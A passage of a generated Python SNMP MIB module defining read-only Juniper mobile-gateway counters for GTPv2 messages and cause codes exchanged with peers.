jnxMbgSgwPPDelSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqRx.setDescription('Number of GTP V2 Delete Session Requests received.')
jnxMbgSgwPPDelSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessReqTx.setDescription('Number of GTP V2 Delete Session Requests Sent.')
jnxMbgSgwPPDelSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspRx.setDescription('Number of GTP V2 Delete Session Responses received.')
jnxMbgSgwPPDelSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 37), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelSessRspTx.setDescription('Number of GTP V2 Delete Session Responses Sent.')
jnxMbgSgwPPCrtBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 38), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqRx.setDescription('Number of GTP V2 Create Bearer Requests received.')
jnxMbgSgwPPCrtBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 39), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrReqTx.setDescription('Number of GTP V2 Create Bearer Requests Sent.')
jnxMbgSgwPPCrtBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 40), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspRx.setDescription('Number of GTP V2 Create Bearer Response received.')
jnxMbgSgwPPCrtBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 41), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrtBrRspTx.setDescription('Number of GTP V2 Create Bearer Response Sent.')
jnxMbgSgwPPUpdBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 42), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqRx.setDescription('Number of GTP V2 Update Bearer Request received.')
jnxMbgSgwPPUpdBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 43), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrReqTx.setDescription('Number of GTP V2 Update Bearer Request Sent.')
jnxMbgSgwPPUpdBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 44), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspRx.setDescription('Number of GTP V2 Update Bearer Response received.')
jnxMbgSgwPPUpdBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 45), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdBrRspTx.setDescription('Number of GTP V2 Update Bearer Response Sent.')
jnxMbgSgwPPDelBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 46), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqRx.setDescription('Number of GTP V2 Delete Bearer Request received.')
jnxMbgSgwPPDelBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 47), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrReqTx.setDescription('Number of GTP V2 Delete Bearer Request Sent.')
jnxMbgSgwPPDelBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 48), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspRx.setDescription('Number of GTP V2 Delete Bearer Response received.')
jnxMbgSgwPPDelBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 49), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrRspTx.setDescription('Number of GTP V2 Delete Bearer Response Sent.')
jnxMbgSgwPPDelConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 50), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqRx.setDescription('Number of GTP V2 Delete PDN connection set Request received.')
jnxMbgSgwPPDelConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 51), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetReqTx.setDescription('Number of GTP V2 Delete PDN connection set Request Sent.')
jnxMbgSgwPPDelConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 52), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspRx.setDescription('Number of GTP V2 Delete PDN connection set Response received.')
jnxMbgSgwPPDelConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 53), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelConnSetRspTx.setDescription('Number of GTP V2 Delete PDN connection set Response Sent.')
jnxMbgSgwPPUpdConnSetReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 54), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqRx.setDescription('Number of GTP V2 Update Connection set Request received.')
jnxMbgSgwPPUpdConnSetReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 55), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetReqTx.setDescription('Number of GTP V2 Update Connection set Request Sent.')
jnxMbgSgwPPUpdConnSetRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 56), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspRx.setDescription('Number of GTP V2 Update Connection set Response received.')
jnxMbgSgwPPUpdConnSetRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 57), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPUpdConnSetRspTx.setDescription('Number of GTP V2 Update Connection set Response Sent.')
jnxMbgSgwPPModBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 58), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdRx.setDescription('Number of GTP V2 Modify Bearer Command received.')
jnxMbgSgwPPModBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 59), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrCmdTx.setDescription('Number of GTP V2 Modify Bearer Command Sent.')
jnxMbgSgwPPModBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 60), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndRx.setDescription('Number of GTP V2 Modify Bearer Failure received.')
jnxMbgSgwPPModBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 61), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPModBrFlrIndTx.setDescription('Number of GTP V2 Modify Bearer Failure Sent.')
jnxMbgSgwPPDelBrCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 62), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdRx.setDescription('Number of GTP V2 Delete Bearer Command received.')
jnxMbgSgwPPDelBrCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 63), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrCmdTx.setDescription('Number of GTP V2 Delete Bearer Command Sent.')
jnxMbgSgwPPDelBrFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 64), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndRx.setDescription('Number of GTP V2 Delete Bearer Failure received.')
jnxMbgSgwPPDelBrFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 65), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelBrFlrIndTx.setDescription('Number of GTP V2 Delete Bearer Failure Sent.')
jnxMbgSgwPPBrResCmdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 66), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdRx.setDescription('Number of GTP V2 Bearer Response Command received.')
jnxMbgSgwPPBrResCmdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 67), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResCmdTx.setDescription('Number of GTP V2 Bearer Response Command Sent.')
jnxMbgSgwPPBrResFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 68), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndRx.setDescription('Number of GTP V2 Bearer Resource Failure received.')
jnxMbgSgwPPBrResFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 69), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPBrResFlrIndTx.setDescription('Number of GTP V2 Bearer Resource Failure Sent.')
jnxMbgSgwPPRelAcsBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 70), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqRx.setDescription('Number of GTP V2 Release Access Bearer Requests received.')
jnxMbgSgwPPRelAcsBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 71), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrReqTx.setDescription('Number of GTP V2 Release Access Bearer Requests sent.')
jnxMbgSgwPPRelAcsBrRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 72), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespRx.setDescription('Number of GTP V2 Release Access Bearer Response received.')
jnxMbgSgwPPRelAcsBrRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 73), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPRelAcsBrRespTx.setDescription('Number of GTP V2 Release Access Bearer Response sent.')
jnxMbgSgwPPCrIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 74), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request Received')
jnxMbgSgwPPCrIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 75), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunReqTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Request sent')
jnxMbgSgwPPCrIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 76), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespRx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response Received')
jnxMbgSgwPPCrIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 77), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPCrIndTunRespTx.setDescription('Number of GTP V2 Create Indirect Tunnel Forward Response sent')
jnxMbgSgwPPDelIndTunReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 78), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request Received')
jnxMbgSgwPPDelIndTunReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 79), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunReqTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Request sent.')
jnxMbgSgwPPDelIndTunRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 80), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespRx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response Received')
jnxMbgSgwPPDelIndTunRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 81), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDelIndTunRespTx.setDescription('Number of GTP V2 Delete Indirect Tunnel Forward Response sent.')
jnxMbgSgwPPDlDataNotifRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 82), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifRx.setDescription('Number of GTP V2 Downlink Data Notify received.')
jnxMbgSgwPPDlDataNotifTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 83), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotifTx.setDescription('Number of GTP V2 Downlink Data Notify Sent.')
jnxMbgSgwPPDlDataAckRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 84), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckRx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement received.')
jnxMbgSgwPPDlDataAckTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 85), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataAckTx.setDescription('Number of GTP V2 Downlink Data Notify Acknowledgement Sent.')
jnxMbgSgwPPDlDataNotiFlrIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 86), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndRx.setDescription('Number of GTP V2 Downlink Data Notification fail received.')
jnxMbgSgwPPDlDataNotiFlrIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 87), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPDlDataNotiFlrIndTx.setDescription('Number of GTP V2 Downlink Data Notification fail Sent.')
jnxMbgSgwPPStopPagingIndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 88), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndRx.setDescription('Number of GTP V2 Number of Stop Paging Indication Messages Received.')
jnxMbgSgwPPStopPagingIndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 89), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPStopPagingIndTx.setDescription('Number of GTP V2 Number of Stop Paging Indicaton messages sent')
jnxMbgSgwPPGtpV2ICsPageRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 90), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageRx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageRx.setDescription('Number of GTPV2 packets received with cause Page.')
jnxMbgSgwPPGtpV2ICsPageTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 91), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageTx.setStatus('obsolete')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsPageTx.setDescription('Number of GTP packets sent with cause Page.')
jnxMbgSgwPPGtpV2ICsReqAcceptRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 92), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptRx.setDescription('Number of GTPV2 packets received with cause Request Accept.')
jnxMbgSgwPPGtpV2ICsReqAcceptTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 93), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsReqAcceptTx.setDescription('Number of GTP packets sent with cause Request Accept.')
jnxMbgSgwPPGtpV2ICsAcceptPartRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 94), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartRx.setDescription('Number of GTPV2 packets received with cause Accept Partial.')
jnxMbgSgwPPGtpV2ICsAcceptPartTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 95), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsAcceptPartTx.setDescription('Number of GTP packets sent with cause Accept Partial.')
jnxMbgSgwPPGtpV2ICsNewPTNPrefRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 96), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Network Preference.')
jnxMbgSgwPPGtpV2ICsNewPTNPrefTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 97), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNewPTNPrefTx.setDescription('Number of GTP packets sent with cause New PDN type due to Network Preference.')
jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 98), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx.setDescription('Number of GTPV2 packets received with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 99), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsNPTSIAdbrTx.setDescription('Number of GTP packets sent with cause New PDN type due to Single Address Bearer.')
jnxMbgSgwPPGtpV2ICsCtxNotFndRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 100), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndRx.setDescription('Number of GTPV2 packets received with cause Context not found.')
jnxMbgSgwPPGtpV2ICsCtxNotFndTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 101), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsCtxNotFndTx.setDescription('Number of GTP packets sent with cause Context not found.')
jnxMbgSgwPPGtpV2ICsInvMsgFmtRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 102), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtRx.setDescription('Number of GTPV2 packets received with cause Invalid Message Format.')
jnxMbgSgwPPGtpV2ICsInvMsgFmtTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 103), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsInvMsgFmtTx.setDescription('Number of GTP packets sent with cause Invalid Message Format.')
jnxMbgSgwPPGtpV2ICsVerNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 104), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppRx.setDescription('Number of GTPV2 packets received with cause Version not Supported.')
jnxMbgSgwPPGtpV2ICsVerNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 105), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPPGtpV2ICsVerNotSuppTx.setDescription('Number of GTP packets sent with cause Version not Supported.')
jnxMbgSgwPPGtpV2ICsInvLenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 1, 1, 106), Counter64()).setMaxAccess("readonly")
